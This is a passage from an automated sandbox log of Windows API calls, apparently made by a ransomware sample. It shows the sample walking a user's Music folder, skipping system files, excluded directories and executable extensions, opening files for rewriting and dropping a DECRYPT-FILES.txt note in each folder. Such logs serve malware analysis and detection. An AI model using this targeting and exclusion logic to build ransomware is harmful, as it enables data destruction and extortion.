(in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37b1a840, ftCreationTime.dwHighDateTime=0x1d4c86c, ftLastAccessTime.dwLowDateTime=0xc898ded0, ftLastAccessTime.dwHighDateTime=0x1d4cada, ftLastWriteTime.dwLowDateTime=0xaefec200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xb698, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7NQgKG6cOq2.m4a.CBiAihw", cAlternateFileName="7NQGKG~1.CBI")) returned 1 [0185.802] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a.CBiAihw", lpString2="DECRYPT-FILES.txt") returned -1 [0185.802] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a.CBiAihw", lpString2="autorun.inf") returned -1 [0185.802] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a.CBiAihw", lpString2="boot.ini") returned -1 [0185.802] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a.CBiAihw", lpString2="desktop.ini") returned -1 [0185.802] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a.CBiAihw", lpString2="ntuser.dat") returned -1 [0185.802] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a.CBiAihw", lpString2="iconcache.db") returned -1 [0185.802] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a.CBiAihw", lpString2="bootsect.bak") returned -1 [0185.802] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a.CBiAihw", lpString2="ntuser.dat.log") returned -1 [0185.802] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a.CBiAihw", lpString2="thumbs.db") returned -1 [0185.802] lstrcmpiW (lpString1="7NQgKG6cOq2.m4a.CBiAihw", lpString2="Bootfont.bin") returned -1 [0185.802] lstrlenW (lpString="7NQgKG6cOq2.m4a.CBiAihw") returned 23 [0185.802] lstrcmpiW (lpString1="CBiAihw", lpString2="lnk") returned -1 [0185.802] lstrcmpiW (lpString1="CBiAihw", lpString2="exe") returned -1 [0185.802] lstrcmpiW (lpString1="CBiAihw", lpString2="sys") returned -1 [0185.802] lstrcmpiW (lpString1="CBiAihw", lpString2="dll") returned -1 [0185.802] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 36 [0185.802] lstrlenW (lpString="7NQgKG6cOq2.m4a.CBiAihw") returned 23 [0185.802] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0185.802] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="7NQgKG6cOq2.m4a.CBiAihw" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7NQgKG6cOq2.m4a.CBiAihw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7NQgKG6cOq2.m4a.CBiAihw" [0185.803] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.803] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7NQgKG6cOq2.m4a.CBiAihw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7nqgkg6coq2.m4a.cbiaihw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0185.804] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=46744) returned 1 [0185.804] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0185.804] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.805] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.805] CloseHandle (hObject=0x260) returned 1 [0185.805] CloseHandle (hObject=0x25c) returned 1 [0185.805] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.805] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5ce480, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae5ce480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae5ce480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.805] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.805] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0185.805] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0185.805] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0185.805] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0185.805] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0185.805] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2a59480, ftCreationTime.dwHighDateTime=0x1d4cfcb, ftLastAccessTime.dwLowDateTime=0x9ffef080, ftLastAccessTime.dwHighDateTime=0x1d4cbf8, ftLastWriteTime.dwLowDateTime=0xaf0384c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x116b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="i32QS.wav.NDQLQ", cAlternateFileName="I32QSW~1.NDQ")) returned 1 [0185.805] lstrcmpiW (lpString1="i32QS.wav.NDQLQ", lpString2="DECRYPT-FILES.txt") returned 1 [0185.805] lstrcmpiW (lpString1="i32QS.wav.NDQLQ", lpString2="autorun.inf") returned 1 [0185.805] lstrcmpiW (lpString1="i32QS.wav.NDQLQ", lpString2="boot.ini") returned 1 [0185.805] lstrcmpiW (lpString1="i32QS.wav.NDQLQ", lpString2="desktop.ini") returned 1 [0185.805] lstrcmpiW (lpString1="i32QS.wav.NDQLQ", lpString2="ntuser.dat") returned -1 [0185.806] lstrcmpiW (lpString1="i32QS.wav.NDQLQ", lpString2="iconcache.db") returned -1 [0185.806] lstrcmpiW (lpString1="i32QS.wav.NDQLQ", lpString2="bootsect.bak") returned 1 [0185.806] lstrcmpiW (lpString1="i32QS.wav.NDQLQ", lpString2="ntuser.dat.log") returned -1 [0185.806] lstrcmpiW (lpString1="i32QS.wav.NDQLQ", lpString2="thumbs.db") returned -1 [0185.806] lstrcmpiW (lpString1="i32QS.wav.NDQLQ", lpString2="Bootfont.bin") returned 1 [0185.806] lstrlenW (lpString="i32QS.wav.NDQLQ") returned 15 [0185.806] lstrcmpiW (lpString1="NDQLQ", lpString2="lnk") returned 1 [0185.806] lstrcmpiW (lpString1="NDQLQ", lpString2="exe") returned 1 [0185.806] lstrcmpiW (lpString1="NDQLQ", lpString2="sys") returned -1 [0185.806] lstrcmpiW (lpString1="NDQLQ", lpString2="dll") returned 1 [0185.806] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 36 [0185.806] lstrlenW (lpString="i32QS.wav.NDQLQ") returned 15 [0185.806] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0185.806] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="i32QS.wav.NDQLQ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\i32QS.wav.NDQLQ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\i32QS.wav.NDQLQ" [0185.806] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.806] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\i32QS.wav.NDQLQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i32qs.wav.ndqlq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0185.806] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=4459) returned 1 [0185.806] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0185.807] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.807] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.807] CloseHandle (hObject=0x260) returned 1 [0185.807] CloseHandle (hObject=0x25c) returned 1 [0185.807] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.808] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6b9a910, ftCreationTime.dwHighDateTime=0x1d4d208, ftLastAccessTime.dwLowDateTime=0x73d7d550, ftLastAccessTime.dwHighDateTime=0x1d4cc7d, ftLastWriteTime.dwLowDateTime=0xaf05e620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1292d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k_FSFKeTr9.m4a.qyi8Z", cAlternateFileName="K_FSFK~1.QYI")) returned 1 [0185.808] lstrcmpiW (lpString1="k_FSFKeTr9.m4a.qyi8Z", lpString2="DECRYPT-FILES.txt") returned 1 [0185.808] lstrcmpiW (lpString1="k_FSFKeTr9.m4a.qyi8Z", lpString2="autorun.inf") returned 1 [0185.808] lstrcmpiW (lpString1="k_FSFKeTr9.m4a.qyi8Z", lpString2="boot.ini") returned 1 [0185.808] lstrcmpiW (lpString1="k_FSFKeTr9.m4a.qyi8Z", lpString2="desktop.ini") returned 1 [0185.808] lstrcmpiW (lpString1="k_FSFKeTr9.m4a.qyi8Z", lpString2="ntuser.dat") returned -1 [0185.808] lstrcmpiW (lpString1="k_FSFKeTr9.m4a.qyi8Z", lpString2="iconcache.db") returned 1 [0185.808] lstrcmpiW (lpString1="k_FSFKeTr9.m4a.qyi8Z", lpString2="bootsect.bak") returned 1 [0185.808] lstrcmpiW (lpString1="k_FSFKeTr9.m4a.qyi8Z", lpString2="ntuser.dat.log") returned -1 [0185.808] lstrcmpiW (lpString1="k_FSFKeTr9.m4a.qyi8Z", lpString2="thumbs.db") returned -1 [0185.808] lstrcmpiW (lpString1="k_FSFKeTr9.m4a.qyi8Z", lpString2="Bootfont.bin") returned 1 [0185.808] lstrlenW (lpString="k_FSFKeTr9.m4a.qyi8Z") returned 20 [0185.808] lstrcmpiW (lpString1="qyi8Z", lpString2="lnk") returned 1 [0185.808] lstrcmpiW (lpString1="qyi8Z", lpString2="exe") returned 1 [0185.808] lstrcmpiW (lpString1="qyi8Z", lpString2="sys") returned -1 [0185.808] lstrcmpiW (lpString1="qyi8Z", lpString2="dll") returned 1 [0185.808] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 36 [0185.808] lstrlenW (lpString="k_FSFKeTr9.m4a.qyi8Z") returned 20 [0185.808] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0185.808] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="k_FSFKeTr9.m4a.qyi8Z" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k_FSFKeTr9.m4a.qyi8Z") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k_FSFKeTr9.m4a.qyi8Z" [0185.808] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\k_FSFKeTr9.m4a.qyi8Z" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k_fsfketr9.m4a.qyi8z"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0185.809] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=76077) returned 1 [0185.809] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0185.809] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.810] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.810] CloseHandle (hObject=0x260) returned 1 [0185.810] CloseHandle (hObject=0x25c) returned 1 [0185.810] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.810] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11403760, ftCreationTime.dwHighDateTime=0x1d4c85a, ftLastAccessTime.dwLowDateTime=0xaf2bfc20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf2bfc20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PNWITRgLH_4la7ri", cAlternateFileName="PNWITR~1")) returned 1 [0185.810] lstrcmpW (lpString1="PNWITRgLH_4la7ri", lpString2=".") returned 1 [0185.810] lstrcmpW (lpString1="PNWITRgLH_4la7ri", lpString2="..") returned 1 [0185.810] lstrcatW (in: lpString1="PNWITRgLH_4la7ri", lpString2="\\" | out: lpString1="PNWITRgLH_4la7ri\\") returned="PNWITRgLH_4la7ri\\" [0185.810] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="PNWITRgLH_4la7ri\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" [0185.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\Program Files") returned 0x0 [0185.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch=":\\Windows") returned 0x0 [0185.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\Games\\") returned 0x0 [0185.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\All Users") returned 0x0 [0185.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.810] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.811] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="AhnLab") returned 0x0 [0185.811] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.811] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned 53 [0185.811] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.811] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\\\0a16c9.tmp") returned 64 [0185.811] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0185.813] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned 53 [0185.813] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.813] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\\\DECRYPT-FILES.txt") returned 71 [0185.813] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.813] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned 53 [0185.814] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\*" [0185.814] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11403760, ftCreationTime.dwHighDateTime=0x1d4c85a, ftLastAccessTime.dwLowDateTime=0xf1756800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1756800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0185.814] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.814] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11403760, ftCreationTime.dwHighDateTime=0x1d4c85a, ftLastAccessTime.dwLowDateTime=0xf1756800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1756800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.814] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.814] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.814] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1756800, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf1756800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1756800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.814] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.814] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.814] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.814] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.814] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.814] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.814] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.814] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.814] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.814] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.814] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.814] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.814] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.814] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.814] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.814] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned 53 [0185.814] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.814] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" [0185.814] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\0a16c9.tmp" [0185.814] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.815] CloseHandle (hObject=0x0) returned 0 [0185.815] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.815] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b1f2dc0, ftCreationTime.dwHighDateTime=0x1d4c817, ftLastAccessTime.dwLowDateTime=0xaf24d800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf24d800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6FQU", cAlternateFileName="")) returned 1 [0185.815] lstrcmpW (lpString1="6FQU", lpString2=".") returned 1 [0185.815] lstrcmpW (lpString1="6FQU", lpString2="..") returned 1 [0185.815] lstrcatW (in: lpString1="6FQU", lpString2="\\" | out: lpString1="6FQU\\") returned="6FQU\\" [0185.815] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpString2="6FQU\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" [0185.815] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\Program Files") returned 0x0 [0185.815] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch=":\\Windows") returned 0x0 [0185.815] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\Games\\") returned 0x0 [0185.815] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.815] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.815] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.815] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.815] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.815] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\All Users") returned 0x0 [0185.815] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.815] StrStrW 